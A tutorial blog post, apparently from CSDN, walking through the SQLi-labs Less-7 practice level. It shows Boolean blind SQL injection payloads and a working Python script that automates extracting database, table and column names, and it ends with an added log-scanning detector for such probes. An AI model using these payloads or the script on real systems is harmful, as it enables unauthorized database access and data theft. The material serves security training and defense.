SQLi LABS Less-7 Boolean Blind

Author's homepage: Shibie Sanshi wyx
Author's profile: CSDN Top 200, Alibaba Cloud blog expert, Huawei Cloud sharing expert, high-quality creator in the network security field


Level 7 is a string-based injection where the parameter is closed with a single quote plus two closing parentheses ( `'))` ); Boolean blind injection is the recommended approach.

Method 1: Boolean blind injection

Recommended article: Detailed explanation of Boolean blind injection: principle + steps + practical tutorial

Step 1: determine the injection point

Enter in the address bar: ?id=1')) and 1 -- a, and the page is displayed normally.
Enter in the address bar: ?id=1')) and 0 -- a, and the page display is abnormal (empty).

Step 2: determine the length

To check whether the length of the current database name is greater than 1 (it certainly is), enter the following in the address bar:

?id=1')) and length(database()) > 1 -- a

The condition holds and the page is displayed normally; the Python script at the end of the article automates this check.

Step 3: enumerate characters

To check whether the ASCII code of the first character of the database name is greater than 1 (it certainly is), enter:

?id=1')) and ascii(substr((database()),1,1)) >1 -- a

The condition holds and the page is displayed normally; the Python script at the end of the article automates this check.

Step 4: dump the database

The Python script is as follows; modify it as needed:

import requests

# Replace url with the address of your own lab level
# Adjust the two payloads as needed

# Target URL (without parameters)
url = "http://55aa541ede774f4da9a2d0f63c3f758c.app.mituan.zone/Less-7/"
# Payload used to guess the length
payload_len = """?id=1')) and length(
    (select group_concat(schema_name)
    from information_schema.schemata)
) ={n} -- a"""
# Payload used to enumerate characters
payload_str = """?id=1')) and ascii(
  substr(
    (select group_concat(schema_name)
     from information_schema.schemata
    ),{n},1)
) ={r} -- a"""

# Get the length
def getLength(url, payload):
    length = 1  # start testing from length 1
    while True:
        response = requests.get(url=url + payload.format(n=length))
        # This string in the page means the condition held (the "true" page)
        if 'You are in....' in response.text:
            print('Length test finished, length is:', length)
            return length
        else:
            print('Testing length:', length)
            length += 1  # try the next length

# Get the characters
def getStr(url, payload, length):
    result = ''  # the table/database name starts empty
    # Outer loop: one character position at a time
    for l in range(1, length + 1):
        # Inner loop: try every printable ASCII value (33..126) for that position
        for n in range(33, 127):
            response = requests.get(url=url + payload.format(n=l, r=n))
            # print('Trying', n)
            # This string in the page means the condition held (the "true" page)
            if 'You are in....' in response.text:
                result += chr(n)
                print('Character', l, 'found:', result)
                break
    return result

# Start guessing
length = getLength(url, payload_len)
getStr(url, payload_str, length)

Get all databases
Payload to determine the length:

?id=1')) and length(
    (select group_concat(schema_name)
    from information_schema.schemata)
) ={n} -- a

Payload to enumerate characters:

?id=1')) and ascii(
  substr(
    (select group_concat(schema_name)
     from information_schema.schemata
    ),{n},1)
) ={r} -- a

Execution result: (screenshot not reproduced)

Get all tables in the security database
Payload to determine the length:

?id=1')) and length(
    (select group_concat(table_name)
    from information_schema.tables
    where table_schema="security")
) ={n} -- a

Payload to enumerate characters:

?id=1')) and ascii(
  substr(
    (select group_concat(table_name)
     from information_schema.tables
     where table_schema="security"
    ),{n},1)
) ={r} -- a

Execution result: (screenshot not reproduced)

Get all columns of the users table
Payload to determine the length:

?id=1')) and length(
    (select group_concat(column_name)
    from information_schema.columns
    where table_schema="security" and table_name="users")
) ={n} -- a

Payload to enumerate characters:

?id=1')) and ascii(
  substr(
    (select group_concat(column_name)
     from information_schema.columns
     where table_schema="security" and table_name="users"
    ),{n},1)
) ={r} -- a
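The defensive counterpart of the procedure above, added here and not part of the original post: a Python check that scans web-server access-log lines for the length()/ascii(substr()) comparison probes this level relies on and groups them by client and path, so a run of such requests from one client stands out. The log lines, the hosts 10.0.0.5 and 10.0.0.9, and the threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache-style access log (hypothetical hosts 10.0.0.5 and 10.0.0.9);
# the first four requests mirror this level's length()/ascii(substr()) probes.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-7/?id=1%27%29%29%20and%20length%28database%28%29%29%20%3E1%20--%20a HTTP/1.1" 200 712
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-7/?id=1%27%29%29%20and%20length%28database%28%29%29%20%3D8%20--%20a HTTP/1.1" 200 712
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-7/?id=1%27%29%29%20and%20ascii%28substr%28database%28%29%2C1%2C1%29%29%20%3D97%20--%20a HTTP/1.1" 200 712
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /Less-7/?id=1%27%29%29%20and%20ascii%28substr%28database%28%29%2C1%2C1%29%29%20%3D115%20--%20a HTTP/1.1" 200 712
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /Less-7/?id=2 HTTP/1.1" 200 712
"""

# Client address and request target from a common/combined log line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')
# A Boolean-blind probe: a length()/ascii() call compared against a number
PROBE_RE = re.compile(r'\b(length|ascii)\s*\(.*?[=<>]\s*(\d+)', re.I | re.S)


def detect_boolean_blind(log_text, min_probes=3):
    """Group probe requests by (client, path) and return the groups with at
    least min_probes hits, with the functions used and the compared values."""
    probes = defaultdict(lambda: {"count": 0, "values": set(), "functions": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m.group(1), unquote_plus(m.group(2))  # decode %xx first
        path, _, query = target.partition("?")
        p = PROBE_RE.search(query)
        if not p:
            continue
        entry = probes[(client, path)]
        entry["count"] += 1
        entry["functions"].add(p.group(1).lower())
        entry["values"].add(int(p.group(2)))
    return {k: v for k, v in probes.items() if v["count"] >= min_probes}


if __name__ == "__main__":
    for (client, path), info in detect_boolean_blind(SAMPLE_LOG).items():
        print(client, path, info["count"], sorted(info["values"]), sorted(info["functions"]))
```

A growing set of distinct compared values from one client against one path is the signature to alert on; a single probe in isolation is not enough.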


Source: blog.csdn.net/wangyuxiang946/article/details/123839328